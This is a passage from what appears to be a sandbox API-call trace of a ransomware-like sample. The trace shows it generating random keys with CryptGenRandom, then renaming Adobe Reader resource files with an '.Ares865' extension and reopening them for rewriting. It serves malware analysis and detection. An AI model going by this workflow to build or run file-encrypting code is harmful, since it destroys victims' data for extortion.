(in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0158.857] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.860] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="spn32.clx" | out: lpString1="spn32.clx") returned="spn32.clx" [0158.860] lstrlenW (lpString="spn32.clx") returned 9 [0158.860] lstrlenW (lpString="Ares865") returned 7 [0158.860] lstrcmpiW (lpString1="n32.clx", lpString2="Ares865") returned 1 [0158.860] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\spn32.clx.Ares865") returned 105 [0158.860] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\spn32.clx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\spn32.clx"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\spn32.clx.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\spn32.clx.ares865"), dwFlags=0x1) returned 1 [0158.863] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\spn32.clx.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\spn32.clx.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0158.863] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=32766) returned 1 [0158.864] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0158.865] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0158.865] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.870] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0158.871] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0158.871] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.872] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="spn62.ths" | out: lpString1="spn62.ths") returned="spn62.ths" [0158.872] lstrlenW (lpString="spn62.ths") returned 9 [0158.872] lstrlenW (lpString="Ares865") returned 7 [0158.872] lstrcmpiW (lpString1="n62.ths", lpString2="Ares865") returned 1 [0158.872] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\spn62.ths.Ares865") returned 105 [0158.872] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\spn62.ths" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\spn62.ths"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\spn62.ths.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\spn62.ths.ares865"), dwFlags=0x1) returned 1 [0158.875] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\spn62.ths.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\spn62.ths.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0158.875] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=542720) returned 1 [0158.875] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0158.876] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0158.876] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.908] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0158.909] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0158.909] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.917] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="swd.fca" | out: lpString1="swd.fca") returned="swd.fca" [0158.917] lstrlenW (lpString="swd.fca") returned 7 [0158.917] lstrlenW (lpString="Ares865") returned 7 [0158.917] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\swd.fca.Ares865") returned 103 [0158.918] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\swd.fca" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\swd.fca"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\swd.fca.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\swd.fca.ares865"), dwFlags=0x1) returned 1 [0158.926] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\swd.fca.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\swd.fca.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0158.926] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=908) returned 1 [0158.927] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0158.928] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0158.928] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.930] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0158.931] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0158.931] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.931] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="swd.hyp" | out: lpString1="swd.hyp") returned="swd.hyp" [0158.931] lstrlenW (lpString="swd.hyp") returned 7 [0158.931] lstrlenW (lpString="Ares865") returned 7 [0158.932] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\swd.hyp.Ares865") returned 103 [0158.932] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\swd.hyp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\swd.hyp"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\swd.hyp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\swd.hyp.ares865"), dwFlags=0x1) returned 1 [0158.934] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\swd.hyp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\swd.hyp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0158.934] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=52224) returned 1 [0158.935] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0158.935] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0158.935] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.939] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0158.940] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0158.940] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.941] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="swd32.clx" | out: lpString1="swd32.clx") returned="swd32.clx" [0158.941] lstrlenW (lpString="swd32.clx") returned 9 [0158.941] lstrlenW (lpString="Ares865") returned 7 [0158.941] lstrcmpiW (lpString1="d32.clx", lpString2="Ares865") returned 1 [0158.942] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\swd32.clx.Ares865") returned 105 [0158.942] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\swd32.clx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\swd32.clx"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\swd32.clx.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\swd32.clx.ares865"), dwFlags=0x1) returned 1 [0158.946] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\swd32.clx.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\swd32.clx.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0158.946] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=32768) returned 1 [0158.947] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0158.947] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0158.947] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.960] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0158.960] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0158.960] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.961] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="swd43.hsp" | out: lpString1="swd43.hsp") returned="swd43.hsp" [0158.961] lstrlenW (lpString="swd43.hsp") returned 9 [0158.961] lstrlenW (lpString="Ares865") returned 7 [0158.962] lstrcmpiW (lpString1="d43.hsp", lpString2="Ares865") returned 1 [0158.962] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\swd43.hsp.Ares865") returned 105 [0158.962] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\swd43.hsp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\swd43.hsp"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\swd43.hsp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\swd43.hsp.ares865"), dwFlags=0x1) returned 1 [0158.964] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\swd43.hsp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\swd43.hsp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0158.964] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=532925) returned 1 [0158.965] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0158.965] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0158.965] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.002] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0159.002] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0159.002] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.010] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="swd58.ths" | out: lpString1="swd58.ths") returned="swd58.ths" [0159.010] lstrlenW (lpString="swd58.ths") returned 9 [0159.010] lstrlenW (lpString="Ares865") returned 7 [0159.010] lstrcmpiW (lpString1="d58.ths", lpString2="Ares865") returned 1 [0159.010] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\swd58.ths.Ares865") returned 105 [0159.010] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\swd58.ths" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\swd58.ths"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\swd58.ths.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\swd58.ths.ares865"), dwFlags=0x1) returned 1 [0159.014] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\swd58.ths.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\swd58.ths.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0159.014] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1112064) returned 1 [0159.014] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0159.015] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0159.015] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.079] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0159.080] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0159.080] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.095] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="tur.fca" | out: lpString1="tur.fca") returned="tur.fca" [0159.095] lstrlenW (lpString="tur.fca") returned 7 [0159.095] lstrlenW (lpString="Ares865") returned 7 [0159.095] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\tur.fca.Ares865") returned 103 [0159.095] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\tur.fca" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\tur.fca"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\tur.fca.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\tur.fca.ares865"), dwFlags=0x1) returned 1 [0159.099] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\tur.fca.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\tur.fca.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0159.100] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=708) returned 1 [0159.100] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0159.101] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0159.101] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.104] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0159.104] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0159.104] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.105] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="tur.hyp" | out: lpString1="tur.hyp") returned="tur.hyp" [0159.105] lstrlenW (lpString="tur.hyp") returned 7 [0159.105] lstrlenW (lpString="Ares865") returned 7 [0159.105] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\tur.hyp.Ares865") returned 103 [0159.105] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\tur.hyp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\tur.hyp"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\tur.hyp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\tur.hyp.ares865"), dwFlags=0x1) returned 1 [0159.108] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\tur.hyp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\tur.hyp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0159.108] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2048) returned 1 [0159.108] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0159.109] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0159.109] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.111] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0159.112] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0159.112] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.113] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="tur111.hsp" | out: lpString1="tur111.hsp") returned="tur111.hsp" [0159.113] lstrlenW (lpString="tur111.hsp") returned 10 [0159.113] lstrlenW (lpString="Ares865") returned 7 [0159.113] lstrcmpiW (lpString1="111.hsp", lpString2="Ares865") returned -1 [0159.113] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\tur111.hsp.Ares865") returned 106 [0159.113] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\tur111.hsp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\tur111.hsp"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\tur111.hsp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\tur111.hsp.ares865"), dwFlags=0x1) returned 1 [0159.115] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\tur111.hsp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\tur111.hsp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0159.115] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=469814) returned 1 [0159.115] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0159.116] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0159.116] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.146] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0159.147] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0159.147] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.153] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="tur32.clx" | out: lpString1="tur32.clx") returned="tur32.clx" [0159.153] lstrlenW (lpString="tur32.clx") returned 9 [0159.153] lstrlenW (lpString="Ares865") returned 7 [0159.153] lstrcmpiW (lpString1="r32.clx", lpString2="Ares865") returned 1 [0159.154] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\tur32.clx.Ares865") returned 105 [0159.154] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\tur32.clx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\tur32.clx"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\tur32.clx.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\tur32.clx.ares865"), dwFlags=0x1) returned 1 [0159.156] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\tur32.clx.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\tur32.clx.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0159.156] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=32764) returned 1 [0159.157] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0159.157] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0159.157] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.168] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0159.169] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0159.169] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.170] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="usa.fca" | out: lpString1="usa.fca") returned="usa.fca" [0159.170] lstrlenW (lpString="usa.fca") returned 7 [0159.170] lstrlenW (lpString="Ares865") returned 7 [0159.170] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\usa.fca.Ares865") returned 103 [0159.170] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 